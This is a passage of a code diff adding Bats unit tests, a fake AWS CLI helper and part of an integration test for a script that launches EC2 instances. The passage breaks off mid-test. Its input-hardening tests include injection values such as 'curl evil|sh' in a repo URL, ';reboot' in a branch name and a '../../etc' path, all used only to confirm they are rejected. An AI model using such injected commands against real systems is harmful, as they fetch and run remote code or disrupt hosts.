+        check "root device is /dev/sda1" "/dev/sda1" "$(ii '.RootDeviceName')"
+        verify_volumes 20 gp3 0    # size override must land on the REAL root
+    fi
+    terminate_instance "${IID:-}"
+fi
+
+# 5. Cluster placement group (created if missing), instance lands in it.
+if want "placement-group"; then
+    PG="repro-inttest-pg-$$-${RANDOM}"
+    CREATED_PGS+=("${PG}")
+    if launch_case "placement-group" "${WORK}/t5.json" \
+        INSTANCE_TYPE="${PG_TYPE}" PLACEMENT_GROUP_NAME="${PG}" PLACEMENT_GROUP_STRATEGY=cluster EXPNAME="intg-pg"; then
+        check "instance is in the placement group" "${PG}" "$(ii '.Placement.GroupName')"
+        check "resource JSON records the PG name"  "${PG}" "$(jq -r '.placement_group.name // empty' "${WORK}/t5.json")"
+    fi
+    # Terminate the member first (a PG with members cannot be deleted), then
+    # delete the group we created and verify it is gone.
+    terminate_instance "${IID:-}"
+    delete_pg "${PG}"
+    check "placement group deleted" "0" "$( [ -z "${CREATED_PGS[*]:-}" ] && echo 0 || echo 1 )"
+fi
+
+# --------------------------------------------------------------------------
+# Summary.
+# --------------------------------------------------------------------------
+printf '\n%s==================== Results ====================%s\n' "${CYN}" "${RST}"
+printf '  assertions: %d   passed: %s%d%s   failed: %s%d%s\n' \
+    "${TESTS}" "${GRN}" "${PASS}" "${RST}" "${RED}" "${FAIL}" "${RST}"
+if [ "${KEEP}" = "true" ] && [ "${#CREATED_INSTANCES[@]}" -gt 0 ]; then
+    warn "--keep set: leaving ${#CREATED_INSTANCES[@]} instance(s) running: ${CREATED_INSTANCES[*]}"
+fi
+if [ "${FAIL}" -eq 0 ]; then
+    printf '  %sALL CHECKS PASSED%s\n' "${GRN}" "${RST}"
+    exit 0
+else
+    printf '  %s%d CHECK(S) FAILED%s\n' "${RED}" "${FAIL}" "${RST}"
+    exit 1
+fi

--- a/tests/unit/helpers/fake_aws.bash
+++ b/tests/unit/helpers/fake_aws.bash
@@ -1,0 +1,184 @@
+# fake_aws.bash - shared Bats helper: fake `aws` CLI + script runner.
+#
+# Shadows the real AWS CLI with a deterministic fake placed first on PATH so
+# the scripts under test never reach AWS. Behaviour is driven by FAKE_* env
+# vars passed per test. Provides:
+#   make_fake_aws   - build the fake `aws` binary (call from setup_file)
+#   run_script      - run a script under `env -i` isolation; sets RC/OUTPUT/OPLOG
+#   get_arg <opt>   - print the argv token following <opt> in the captured
+#                     `ec2 run-instances` call
+#
+# Usage in a .bats file:
+#   load '../helpers/fake_aws'
+#   setup_file() { make_fake_aws; }
+#   setup()      { fake_aws_reset; }
+
+make_fake_aws() {
+    export FAKEBIN="${BATS_FILE_TMPDIR}/bin"
+    mkdir -p "${FAKEBIN}"
+    cat > "${FAKEBIN}/aws" <<'FAKE'
+#!/usr/bin/env bash
+# Minimal deterministic stand-in for the AWS CLI.
+args=("$@"); n=${#args[@]}
+service=""; op=""
+for ((i=0; i<n; i++)); do
+    case "${args[i]}" in
+        ec2|sts|configure) service="${args[i]}"; op="${args[i+1]:-}"; break ;;
+    esac
+done
+echo "${service} ${op}" >> "${AWS_OPLOG:-/dev/null}"
+
+# Record the --region/--profile the aws_cli wrapper injected, so a test can
+# assert the flags are actually passed (regression guard for wrong account).
+for ((i=0; i<n; i++)); do
+    case "${args[i]}" in
+        --region)  echo "region ${args[i+1]:-}"  >> "${AWS_FLAGLOG:-/dev/null}" ;;
+        --profile) echo "profile ${args[i+1]:-}" >> "${AWS_FLAGLOG:-/dev/null}" ;;
+    esac
+done
+
+case "${service} ${op}" in
+    "configure get")
+        printf '%s\n' "${FAKE_REGION:-}" ;;
+    "sts get-caller-identity")
+        printf '%s\n' "${FAKE_ARN:-arn:fake}" ;;
+    "ec2 describe-images")
+        # Two uses: alias resolution (--owners/--filters -> ImageId) and the
+        # root-device lookup (--image-ids <ami> -> RootDeviceName).
+        _by_ids=0
+        for a in "${args[@]}"; do
+            case "$a" in --image-ids) _by_ids=1 ;; esac
+        done
+        if [ "${_by_ids}" = "1" ]; then
+            printf '%s\n' "${FAKE_ROOT_DEVICE:-/dev/xvda}"
+        else
+            printf '%s\n' "${FAKE_AMI:-ami-fake}"
+        fi ;;
+    "ec2 describe-vpcs")
+        printf '%s\n' "${FAKE_VPC:-vpc-fake}" ;;
+    "ec2 describe-subnets")
+        # Two uses: resolve a provided subnet's VPC (--subnet-ids ... -> VpcId),
+        # or discover a subnet in a VPC (--filters vpc-id ... -> SubnetId).
+        _by_id=0
+        for a in "${args[@]}"; do
+            case "$a" in --subnet-ids) _by_id=1 ;; esac
+        done
+        if [ "${_by_id}" = "1" ]; then
+            printf '%s\n' "${FAKE_SUBNET_VPC:-vpc-fromsubnet}"
+        else
+            printf '%s\n' "${FAKE_SUBNET:-subnet-fake}"
+        fi ;;
+    "ec2 describe-security-groups")
+        printf '%s\n' "${FAKE_SG:-sg-fake}" ;;
+    "ec2 run-instances")
+        : > "${AWS_CAPTURE:-/dev/null}"
+        for a in "${args[@]}"; do printf '%s\0' "$a" >> "${AWS_CAPTURE:-/dev/null}"; done
+        for a in "${args[@]}"; do
+            if [ "$a" = "--dry-run" ]; then
+                # FAKE_DRYRUN_ERROR simulates a real EC2 rejection (e.g. an
+                # authorization failure) instead of the DryRunOperation success.
+                if [ -n "${FAKE_DRYRUN_ERROR:-}" ]; then
+                    echo "An error occurred (${FAKE_DRYRUN_ERROR}) when calling the RunInstances operation: not authorized." >&2
+                else
+                    echo "An error occurred (DryRunOperation) when calling the RunInstances operation: Request would have succeeded, but DryRun flag is set." >&2
+                fi
+                exit 254
+            fi
+        done
+        printf '%s\n' "${FAKE_INSTANCE_ID:-i-fake}" ;;
+    "ec2 wait")
+        exit 0 ;;
+    "ec2 describe-placement-groups")
+        # Existing group -> its id; otherwise "None" (script then creates one).
+        printf '%s\n' "${FAKE_PG_ID:-None}" ;;
+    "ec2 create-placement-group")
+        # Capture the full argv so a test can assert --strategy/--partition-count.
+        : > "${PG_CREATE_CAPTURE:-/dev/null}"
+        for a in "${args[@]}"; do printf '%s\0' "$a" >> "${PG_CREATE_CAPTURE:-/dev/null}"; done
+        printf '%s\n' "${FAKE_PG_CREATE_ID:-pg-0newpg}" ;;
+    "ec2 describe-instances")
+        # FAKE_DESCRIBE_INSTANCES_FAIL simulates a transient post-launch failure
+        # (throttling / eventual consistency) on the final summary describe.
+        _is_pg_member=0
+        for a in "${args[@]}"; do
+            case "$a" in *placement-group-name*) _is_pg_member=1 ;; esac
+        done
+        if [ "${_is_pg_member}" = "1" ]; then
+            printf '%s\n' "${FAKE_PG_MEMBER_SUBNET:-None}"
+        else
+            if [ -n "${FAKE_DESCRIBE_INSTANCES_FAIL:-}" ]; then
+                echo "An error occurred (RequestLimitExceeded) when calling the DescribeInstances operation." >&2
+                exit 255
+            fi
+            printf '%s\t%s\t%s\t%s\n' "${FAKE_STATE:-running}" "${FAKE_AZ:-az}" "${FAKE_PRIV:-10.0.0.1}" "${FAKE_PUB:-1.1.1.1}"
+        fi ;;
+    *)
+        echo "fake-aws: unhandled command: ${service} ${op}" >&2; exit 1 ;;
+esac
+FAKE
+    chmod +x "${FAKEBIN}/aws"
+}
+
+# Per-test capture files live in the test's own tmpdir.
+fake_aws_reset() {
+    export AWS_CAPTURE="${BATS_TEST_TMPDIR}/run_instances_args"
+    export AWS_OPLOG="${BATS_TEST_TMPDIR}/oplog"
+    export AWS_FLAGLOG="${BATS_TEST_TMPDIR}/flaglog"
+    export PG_CREATE_CAPTURE="${BATS_TEST_TMPDIR}/pg_create_args"
+    : > "${AWS_CAPTURE}"; : > "${AWS_OPLOG}"; : > "${AWS_FLAGLOG}"; : > "${PG_CREATE_CAPTURE}"
+}
+
+# run_script <script-path> KEY=VAL ... -> sets globals: RC, OUTPUT, OPLOG, FLAGLOG
+run_script() {
+    local script="$1"; shift
+    RC=0
+    OUTPUT="$(env -i \
+        PATH="${FAKEBIN}:/usr/bin:/bin" \
+        HOME="${HOME}" \
+        AWS_CAPTURE="${AWS_CAPTURE}" \
+        AWS_OPLOG="${AWS_OPLOG}" \
+        AWS_FLAGLOG="${AWS_FLAGLOG}" \
+        PG_CREATE_CAPTURE="${PG_CREATE_CAPTURE}" \
+        RESOURCE_FILE="${BATS_TEST_TMPDIR}/resources.json" \
+        FAKE_REGION="us-west-2" \
+        FAKE_ARN="arn:aws:sts::123456789012:assumed-role/Test/session" \
+        FAKE_AMI="ami-deadbeef" \
+        FAKE_VPC="vpc-11111111" \
+        FAKE_SUBNET="subnet-22222222" \
+        FAKE_SG="sg-33333333" \
+        FAKE_INSTANCE_ID="i-0abc123def456" \
+        FAKE_STATE="running" \
+        FAKE_AZ="us-west-2a" \
+        FAKE_PRIV="10.0.0.5" \
+        FAKE_PUB="52.10.20.30" \
+        "$@" \
+        bash "${script}" 2>&1)" || RC=$?
+    OPLOG="$(cat "${AWS_OPLOG}" 2>/dev/null)"
+    FLAGLOG="$(cat "${AWS_FLAGLOG}" 2>/dev/null)"
+}
+
+# get_arg <option> -> prints the argv token immediately following <option> in
+# the captured run-instances call (e.g. get_arg --image-id).
+get_arg() {
+    local want="$1" prev="" a
+    while IFS= read -r -d '' a; do
+        [ "${prev}" = "${want}" ] && { printf '%s' "$a"; return 0; }
+        prev="$a"
+    done < "${AWS_CAPTURE}"
+    return 1
+}
+
+# get_pg_create_arg <option> -> like get_arg but over the captured
+# create-placement-group call.
+get_pg_create_arg() {
+    local want="$1" prev="" a
+    while IFS= read -r -d '' a; do
+        [ "${prev}" = "${want}" ] && { printf '%s' "$a"; return 0; }
+        prev="$a"
+    done < "${PG_CREATE_CAPTURE}"
+    return 1
+}
+
+# pg_create_argv -> the full create-placement-group argv as a space-joined
+# string (for substring assertions).
+pg_create_argv() { tr '\0' ' ' < "${PG_CREATE_CAPTURE}" 2>/dev/null; }

--- a/tests/unit/scripts/aws_create_instance.bats
+++ b/tests/unit/scripts/aws_create_instance.bats
@@ -1,0 +1,619 @@
+#!/usr/bin/env bats
+#
+# aws_create_instance.bats - Unit tests for scripts/aws_create_instance.sh
+#
+# Strategy: NO real AWS calls are ever made. The `aws` CLI is shadowed with a
+# fake executable first on PATH (tests/unit/helpers/fake_aws.bash), the script runs
+# under `env -i` for full isolation, and the exact `ec2 run-instances` argv is
+# captured to assert on: input validation, arch inference, AMI resolution,
+# subnet/SG discovery vs. provided, block-device mappings, tenancy, tags,
+# user-data, DRYRUN/NO_WAIT paths, region fallback, placement groups and the
+# final summary.
+#
+# Run:  bats tests/unit/scripts/aws_create_instance.bats
+#       bats --filter "placement" tests/unit/scripts/aws_create_instance.bats
+
+setup_file() {
+    export SCRIPT="${BATS_TEST_DIRNAME}/../../../scripts/aws_create_instance.sh"
+    [ -f "${SCRIPT}" ] || { echo "cannot find ${SCRIPT}" >&2; return 1; }
+    make_fake_aws
+}
+
+setup() {
+    bats_load_library bats-support
+    bats_load_library bats-assert
+    fake_aws_reset
+}
+
+load '../helpers/fake_aws'
+
+# Substring assertions on arbitrary strings (OUTPUT/OPLOG/captured argv).
+assert_contains() { # <haystack> <needle>
+    case "$1" in *"$2"*) return 0 ;; esac
+    fail "expected to contain [$2]"$'\n'"in: $1"
+}
+assert_not_contains() { # <haystack> <needle>
+    case "$1" in *"$2"*) fail "should NOT contain [$2]"$'\n'"in: $1" ;; esac
+}
+
+# Common required vars for a successful run (region provided so no config call).
+BASE="AWS_REGION=us-west-2 INSTANCE_TYPE=m8g.large KEYPAIR=k EXPNAME=exp"
+run_sut() { run_script "${SCRIPT}" "$@"; }
+
+# ==========================================================================
+# 0. Static checks
+# ==========================================================================
+
+@test "static: script passes bash -n" {
+    bash -n "${SCRIPT}"
+}
+
+# ==========================================================================
+# 1. Required input validation
+# ==========================================================================
+
+@test "validation: missing INSTANCE_TYPE fails and names the var" {
+    run_sut AWS_REGION=us-west-2 KEYPAIR=k EXPNAME=exp
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "INSTANCE_TYPE"
+}
+
+@test "validation: missing KEYPAIR fails and names the var" {
+    run_sut AWS_REGION=us-west-2 INSTANCE_TYPE=m8g.large EXPNAME=exp
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "KEYPAIR"
+}
+
+@test "validation: missing EXPNAME fails and names the var" {
+    run_sut AWS_REGION=us-west-2 INSTANCE_TYPE=m8g.large KEYPAIR=k
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "EXPNAME"
+}
+
+# ==========================================================================
+# 1b. Input hardening (allowlist / numeric validation) - rejects before any
+#     AWS call, so a crafted value cannot reach user-data or the argv JSON.
+# ==========================================================================
+
+@test "validation: REPO_URL with shell metacharacters rejected" {
+    run_sut $BASE CLONE_REPO=true REPO_URL='https://x/r.git;curl evil|sh'
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "REPO_URL"
+    assert_not_contains "$OPLOG" "ec2 run-instances"
+}
+
+@test "validation: REPO_DEST_NAME '..' rejected (no path traversal)" {
+    run_sut $BASE CLONE_REPO=true REPO_DEST_NAME=..
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "REPO_DEST_NAME"
+}
+
+@test "validation: REPO_BRANCH with metacharacters rejected" {
+    run_sut $BASE CLONE_REPO=true REPO_BRANCH='main;reboot'
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "REPO_BRANCH"
+}
+
+@test "validation: EXPNAME with a path separator rejected" {
+    run_sut $BASE EXPNAME=../../etc
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "EXPNAME"
+}
+
+@test "validation: non-numeric EBS_DISKS_SIZE rejected" {
+    run_sut $BASE EBS_DISKS_NUMBER=1 EBS_DISKS_SIZE=abc CLONE_REPO=false
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "EBS_DISKS_SIZE"
+}
+
+@test "validation: EBS_DISKS_NUMBER above 25 rejected" {
+    run_sut $BASE EBS_DISKS_NUMBER=26 CLONE_REPO=false
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "EBS_DISKS_NUMBER"
+}
+
+@test "validation: malformed SUBNET_ID rejected" {
+    run_sut $BASE SUBNET_ID=not-a-subnet CLONE_REPO=false
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "SUBNET_ID"
+}
+
+@test "validation: bad ASSOCIATE_PUBLIC_IP rejected" {
+    run_sut $BASE ASSOCIATE_PUBLIC_IP=yes CLONE_REPO=false
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "ASSOCIATE_PUBLIC_IP"
+}
+
+@test "validation: OWNER_TAG with spaces is accepted" {
+    run_sut $BASE OWNER_TAG="First Last" CLONE_REPO=false
+    assert_equal "$RC" 0
+    assert_contains "$(get_arg --tag-specifications)" "Key=Owner,Value=First Last"
+}
+
+# ==========================================================================
+# 1c. CLI argument handling
+# ==========================================================================
+
+# --help / bad-arg exit at the argument case before any AWS call or required-var
+# check, so they run the script directly (run_sut passes env vars, not argv).
+@test "args: --help prints the env-var docs and exits 0" {
+    run bash "${SCRIPT}" --help
+    assert_equal "$status" 0
+    assert_contains "$output" "Environment variables"
+    assert_contains "$output" "INSTANCE_TYPE"
+}
+
+@test "args: an unexpected positional argument fails" {
+    run bash "${SCRIPT}" bogusarg
+    assert_equal "$status" 1
+    assert_contains "$output" "Unexpected argument"
+}
+
+# ==========================================================================
+# 2. Architecture inference
+# ==========================================================================
+
+@test "arch: m8g -> arm64" {
+    run_sut $BASE INSTANCE_TYPE=m8g.24xlarge
+    assert_contains "$OUTPUT" "Architecture: arm64"
+}
+
+@test "arch: r8g -> arm64" {
+    run_sut $BASE INSTANCE_TYPE=r8g.4xlarge
+    assert_contains "$OUTPUT" "Architecture: arm64"
+}
+
+@test "arch: x2gd -> arm64" {
+    run_sut $BASE INSTANCE_TYPE=x2gd.medium
+    assert_contains "$OUTPUT" "Architecture: arm64"
+}
+
+@test "arch: m7i -> x86_64" {
+    run_sut $BASE INSTANCE_TYPE=m7i.large
+    assert_contains "$OUTPUT" "Architecture: x86_64"
+}
+
+@test "arch: c6a -> x86_64" {
+    run_sut $BASE INSTANCE_TYPE=c6a.2xlarge
+    assert_contains "$OUTPUT" "Architecture: x86_64"
+}
+
+@test "arch: explicit ARCH overrides inference" {
+    run_sut $BASE INSTANCE_TYPE=m8g.large ARCH=x86_64
+    assert_contains "$OUTPUT" "Architecture: x86_64"
+}
+
+# ==========================================================================
+# 3. AMI resolution
+# ==========================================================================
+
+@test "ami: verbatim ami-... used as image-id, no alias resolution" {
+    # A verbatim id skips alias resolution; the script still makes ONE
+    # describe-images call to read the AMI's root device name.
+    run_sut $BASE AMI=ami-custom0001 CLONE_REPO=false
+    assert_equal "$(get_arg --image-id)" "ami-custom0001"
+    # Exactly one describe-images (the root-device lookup), never two.
+    assert_equal "$(grep -c 'ec2 describe-images' <<<"$OPLOG")" 1
+}
+
+@test "ami: alias resolves via describe-images" {
+    run_sut $BASE AMI=AL2023_K6.12 CLONE_REPO=false
+    assert_equal "$(get_arg --image-id)" "ami-deadbeef"
+    assert_contains "$OPLOG" "ec2 describe-images"
+}
+
+@test "ami: unknown alias fails with explanation" {
+    run_sut $BASE AMI=NOSUCH_ALIAS
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "Unknown AMI alias"
+}
+
+@test "ami: no matching AMI (None) fails with explanation" {
+    run_sut $BASE AMI=AL2023 FAKE_AMI=None
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "No AMI found"
+}
+
+# ==========================================================================
+# 4. Subnet / security-group discovery vs. provided
+# ==========================================================================
+
+@test "network: subnet and SG auto-discovered from default VPC" {
+    run_sut $BASE CLONE_REPO=false
+    NI="$(get_arg --network-interfaces)"
+    assert_contains "$NI" '"SubnetId":"subnet-22222222"'
+    assert_contains "$NI" '"Groups":["sg-33333333"]'
+    assert_contains "$OPLOG" "ec2 describe-vpcs"
+    assert_contains "$OUTPUT" "random of"
+}
+
+@test "network: provided SUBNET_ID and SG_ID used, no discovery" {
+    run_sut $BASE SUBNET_ID=subnet-aaa SG_ID=sg-bbb CLONE_REPO=false
+    NI="$(get_arg --network-interfaces)"
+    assert_contains "$NI" '"SubnetId":"subnet-aaa"'
+    assert_contains "$NI" '"Groups":["sg-bbb"]'
+    assert_not_contains "$OPLOG" "ec2 describe-vpcs"
+    assert_not_contains "$OPLOG" "ec2 describe-subnets"
+}
+
+@test "network: SUBNET_ID without SG_ID derives SG from subnet's VPC, not default VPC" {
+    # This is the case that used to fail on accounts with no default VPC.
+    run_sut $BASE SUBNET_ID=subnet-aaa FAKE_SG=sg-fromvpc CLONE_REPO=false
+    NI="$(get_arg --network-interfaces)"
+    assert_contains "$NI" '"SubnetId":"subnet-aaa"'
+    assert_contains "$NI" '"Groups":["sg-fromvpc"]'
+    assert_not_contains "$OPLOG" "ec2 describe-vpcs"
+    assert_contains "$OPLOG" "ec2 describe-subnets"
+    assert_contains "$OUTPUT" "default SG of vpc-fromsubnet"
+}
+
+@test "network: ASSOCIATE_PUBLIC_IP=false honored" {
+    run_sut $BASE ASSOCIATE_PUBLIC_IP=false CLONE_REPO=false
+    assert_contains "$(get_arg --network-interfaces)" '"AssociatePublicIpAddress":false'
+}
+
+# ==========================================================================
+# 5. Block-device mappings
+# ==========================================================================
+
+@test "bdm: 0 data disks -> root device only (from AMI, gp3 256)" {
+    run_sut $BASE EBS_DISKS_NUMBER=0 CLONE_REPO=false
+    BDM="$(get_arg --block-device-mappings)"
+    NDEV="$(python3 -c 'import json,sys;print(len(json.loads(sys.argv[1])))' "$BDM")"
+    assert_equal "$NDEV" 1
+    # Root device name comes from the AMI (fake default /dev/xvda).
+    assert_contains "$BDM" '"DeviceName":"/dev/xvda","Ebs":{"VolumeSize":256,"VolumeType":"gp3"'
+}
+
+@test "bdm: 12 io2 disks -> 13 devices xvda + sdb..sdm" {
+    run_sut $BASE EBS_DISKS_NUMBER=12 EBS_DISKS_SIZE=1024 EBS_DISKS_TYPE=IO2 EBS_DISKS_IOPS=32000 CLONE_REPO=false
+    BDM="$(get_arg --block-device-mappings)"
+    NDEV="$(python3 -c 'import json,sys;print(len(json.loads(sys.argv[1])))' "$BDM")"
+    DEVS="$(python3 -c 'import json,sys;print(",".join(x["DeviceName"] for x in json.loads(sys.argv[1])))' "$BDM")"
+    assert_equal "$NDEV" 13
+    assert_equal "$DEVS" "/dev/xvda,/dev/sdb,/dev/sdc,/dev/sdd,/dev/sde,/dev/sdf,/dev/sdg,/dev/sdh,/dev/sdi,/dev/sdj,/dev/sdk,/dev/sdl,/dev/sdm"
+    assert_contains "$BDM" '"VolumeType":"io2"'
+    assert_contains "$BDM" '"Iops":32000'
+}
+
+@test "bdm: io2 without explicit IOPS defaults to 16000" {
+    run_sut $BASE EBS_DISKS_NUMBER=1 EBS_DISKS_TYPE=io2 CLONE_REPO=false
+    assert_contains "$(get_arg --block-device-mappings)" '"Iops":16000'
+}
+
+@test "bdm: gp3 defaults IOPS 3000 and applies Throughput" {
+    run_sut $BASE EBS_DISKS_NUMBER=1 EBS_DISKS_TYPE=gp3 EBS_DISKS_THROUGHPUT=250 CLONE_REPO=false
+    BDM="$(get_arg --block-device-mappings)"
+    assert_contains "$BDM" '"Iops":3000'
+    assert_contains "$BDM" '"Throughput":250'
+}
+
+@test "bdm: st1 has no Iops field" {
+    run_sut $BASE EBS_DISKS_NUMBER=1 EBS_DISKS_TYPE=st1 CLONE_REPO=false
+    assert_not_contains "$(get_arg --block-device-mappings)" '"Iops"'
+}
+
+@test "bdm: custom root disk size/type honored" {
+    run_sut $BASE ROOT_DISK_SIZE=100 ROOT_DISK_TYPE=gp2 CLONE_REPO=false
+    assert_contains "$(get_arg --block-device-mappings)" '"DeviceName":"/dev/xvda","Ebs":{"VolumeSize":100,"VolumeType":"gp2"'
+}
+
+@test "bdm: root device name read from the AMI (Ubuntu /dev/sda1)" {
+    run_sut $BASE FAKE_ROOT_DEVICE=/dev/sda1 CLONE_REPO=false
+    BDM="$(get_arg --block-device-mappings)"
+    assert_contains "$BDM" '"DeviceName":"/dev/sda1","Ebs":{"VolumeSize":256'
+    assert_not_contains "$BDM" '"DeviceName":"/dev/xvda"'
+    assert_contains "$OUTPUT" "Root device: /dev/sda1"
+}
+
+@test "bdm: unreadable RootDeviceName falls back to /dev/xvda with a warning" {
+    run_sut $BASE FAKE_ROOT_DEVICE=None CLONE_REPO=false
+    assert_contains "$(get_arg --block-device-mappings)" '"DeviceName":"/dev/xvda"'
+    assert_contains "$OUTPUT" "assuming /dev/xvda"
+}
+
+@test "bdm: io2 root gets mandatory Iops default 16000" {
+    run_sut $BASE ROOT_DISK_TYPE=io2 CLONE_REPO=false
+    # Root is the first BDM entry; assert its Iops via python for precision.
+    BDM="$(get_arg --block-device-mappings)"
+    ROOT_IOPS="$(python3 -c 'import json,sys;print(json.loads(sys.argv[1])[0]["Ebs"].get("Iops"))' "$BDM")"
+    assert_equal "$ROOT_IOPS" 16000
+}
+
+@test "bdm: io1 root default Iops capped to the 50:1 ratio (100 GiB -> 5000)" {
+    run_sut $BASE ROOT_DISK_TYPE=io1 ROOT_DISK_SIZE=100 CLONE_REPO=false
+    BDM="$(get_arg --block-device-mappings)"
+    ROOT_IOPS="$(python3 -c 'import json,sys;print(json.loads(sys.argv[1])[0]["Ebs"].get("Iops"))' "$BDM")"
+    assert_equal "$ROOT_IOPS" 5000
+}
+
+@test "bdm: root Iops cleared (with warning) for a type that rejects it" {
+    run_sut $BASE ROOT_DISK_TYPE=gp2 ROOT_DISK_IOPS=5000 CLONE_REPO=false
+    BDM="$(get_arg --block-device-mappings)"
+    HAS_IOPS="$(python3 -c 'import json,sys;print("Iops" in json.loads(sys.argv[1])[0]["Ebs"])' "$BDM")"
+    assert_equal "$HAS_IOPS" False
+    assert_contains "$OUTPUT" "ROOT_DISK_IOPS does not apply to gp2"
+}
+
+# ==========================================================================
+# 6. Tenancy, tags, key pair, instance type
+# ==========================================================================
+
+@test "tenancy: defaults to dedicated" {
+    run_sut $BASE CLONE_REPO=false
+    assert_contains "$(get_arg --placement)" "Tenancy=dedicated"
+}
+
+@test "tenancy: override honored" {
+    run_sut $BASE TENANCY=default CLONE_REPO=false
+    assert_contains "$(get_arg --placement)" "Tenancy=default"
+}
+
+@test "tags: Name=repro-<EXPNAME>-sut and Owner applied" {
+    run_sut $BASE EXPNAME=myexp OWNER_TAG=tester CLONE_REPO=false
+    TAGS="$(get_arg --tag-specifications)"
+    assert_contains "$TAGS" "Key=Name,Value=repro-myexp-sut"
+    assert_contains "$TAGS" "Key=Owner,Value=tester"
+}
+
+@test "passthrough: key-name and instance-type" {
+    run_sut $BASE KEYPAIR=mykey INSTANCE_TYPE=m8g.24xlarge CLONE_REPO=false
+    assert_equal "$(get_arg --key-name)" "mykey"
+    assert_equal "$(get_arg --instance-type)" "m8g.24xlarge"
+}
+
+# ==========================================================================
+# 7. User-data + repo clone option
+# ==========================================================================
+
+@test "user-data: clone enabled -> SSM disable, git install, default repo into ec2-user home" {
+    run_sut $BASE CLONE_REPO=true
+    UD="$(get_arg --user-data)"
+    assert_contains "$UD" "amazon-ssm-agent"
+    assert_contains "$UD" "git"
+    assert_contains "$UD" "git clone"
+    assert_contains "$UD" "https://github.com/aws/repro-collection.git"
+    assert_contains "$UD" "/home/ec2-user/repro-collection"
+    assert_contains "$OUTPUT" "Repo clone enabled"
+}
+
+@test "user-data: CLONE_REPO=false -> no git clone, base user-data intact" {
+    run_sut $BASE CLONE_REPO=false
+    UD="$(get_arg --user-data)"
+    assert_not_contains "$UD" "git clone"
+    assert_contains "$UD" "amazon-ssm-agent"
+    assert_contains "$OUTPUT" "Repo clone disabled"
+}
+
+@test "user-data: custom REPO_BRANCH/REPO_URL/REPO_DEST_NAME honored" {
+    run_sut $BASE CLONE_REPO=true REPO_BRANCH=gh-action REPO_URL=https://example.com/x.git REPO_DEST_NAME=mydir
+    UD="$(get_arg --user-data)"
+    # Values are single-quoted in the emitted (root-run) user-data.
+    assert_contains "$UD" "git -C \"\$_d\" checkout 'gh-action'"
+    assert_contains "$UD" "https://example.com/x.git"
+    assert_contains "$UD" "/home/ec2-user/mydir"
+}
+
+@test "user-data: repo URL uses 'git clone --' to block option injection" {
+    run_sut $BASE CLONE_REPO=true
+    assert_contains "$(get_arg --user-data)" "git clone -- '"
+}
+
+@test "user-data: Ubuntu AMI clones into /home/ubuntu" {
+    run_sut $BASE AMI=UBUNTU2204 CLONE_REPO=true
+    assert_contains "$(get_arg --user-data)" "/home/ubuntu/repro-collection"
+}
+
+# ==========================================================================
+# 8. DRYRUN path
+# ==========================================================================
+
+@test "dryrun: exits 0 on DryRunOperation, no describe-instances" {
+    run_sut $BASE DRYRUN=true CLONE_REPO=false
+    assert_equal "$RC" 0
+    assert_contains "$OPLOG" "ec2 run-instances"
+    assert_contains "$(tr '\0' ' ' < "$AWS_CAPTURE")" "--dry-run"
+    assert_contains "$OUTPUT" "DryRunOperation"
+    assert_not_contains "$OPLOG" "ec2 describe-instances"
+}
+
+@test "dryrun: a real EC2 error (not DryRunOperation) fails" {
+    run_sut $BASE DRYRUN=true CLONE_REPO=false FAKE_DRYRUN_ERROR=UnauthorizedOperation
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "Dry run failed"
+}
+
+@test "dryrun: missing placement group is NOT created (no account mutation)" {
+    run_sut $BASE DRYRUN=true CLONE_REPO=false TENANCY=default \
+        PLACEMENT_GROUP_NAME=pg-new FAKE_PG_ID=None
+    assert_equal "$RC" 0
+    assert_not_contains "$OPLOG" "ec2 create-placement-group"
+    assert_contains "$OUTPUT" "would be created"
+    # The not-yet-created group must not be referenced in the validated request.
+    assert_not_contains "$(get_arg --placement)" "GroupName"
+}
+
+# ==========================================================================
+# 9. Full launch path + summary
+# ==========================================================================
+
+@test "launch: full path exits 0, waits, and prints summary" {
+    run_sut $BASE CLONE_REPO=false
+    assert_equal "$RC" 0
+    assert_contains "$OPLOG" "ec2 run-instances"
+    assert_contains "$OPLOG" "ec2 wait"
+    assert_contains "$OPLOG" "ec2 describe-instances"
+    assert_contains "$OUTPUT" "i-0abc123def456"
+    assert_contains "$OUTPUT" "10.0.0.5"
+    assert_contains "$OUTPUT" "52.10.20.30"
+    assert_contains "$OUTPUT" "ssh ec2-user@52.10.20.30"
+}
+
+@test "launch: NO_WAIT=true skips wait" {
+    run_sut $BASE NO_WAIT=true CLONE_REPO=false
+    assert_not_contains "$OPLOG" "ec2 wait"
+}
+
+@test "launch: no public IP -> summary shows (none)" {
+    run_sut $BASE FAKE_PUB=None CLONE_REPO=false
+    assert_contains "$OUTPUT" "Public  IP    : (none)"
+}
+
+@test "launch: Ubuntu AMI -> ssh user 'ubuntu'" {
+    run_sut $BASE AMI=UBUNTU2204 CLONE_REPO=false
+    assert_contains "$OUTPUT" "ssh ubuntu@"
+}
+
+@test "launch: instance id tracked even when the summary describe fails" {
+    RJSON="${BATS_TEST_TMPDIR}/orphan.json"
+    run_sut $BASE CLONE_REPO=false RESOURCE_FILE="$RJSON" FAKE_DESCRIBE_INSTANCES_FAIL=1
+    # A post-launch describe failure must not abort the run or lose the id.
+    assert_equal "$RC" 0
+    assert_contains "$OUTPUT" "describe-instances failed"
+    [ -f "$RJSON" ] || fail "resource JSON not written at $RJSON"
+    assert_contains "$(cat "$RJSON")" "i-0abc123def456"
+}
+
+@test "launch: aws_cli injects --region on the calls" {
+    run_sut $BASE CLONE_REPO=false
+    assert_contains "$FLAGLOG" "region us-west-2"
+}
+
+@test "launch: aws_cli injects --profile when AWS_PROFILE is set" {
+    run_sut $BASE CLONE_REPO=false AWS_PROFILE=myprof
+    assert_contains "$FLAGLOG" "profile myprof"
+}
+
+@test "launch: default SG -> summary carries an SSH-may-fail caveat" {
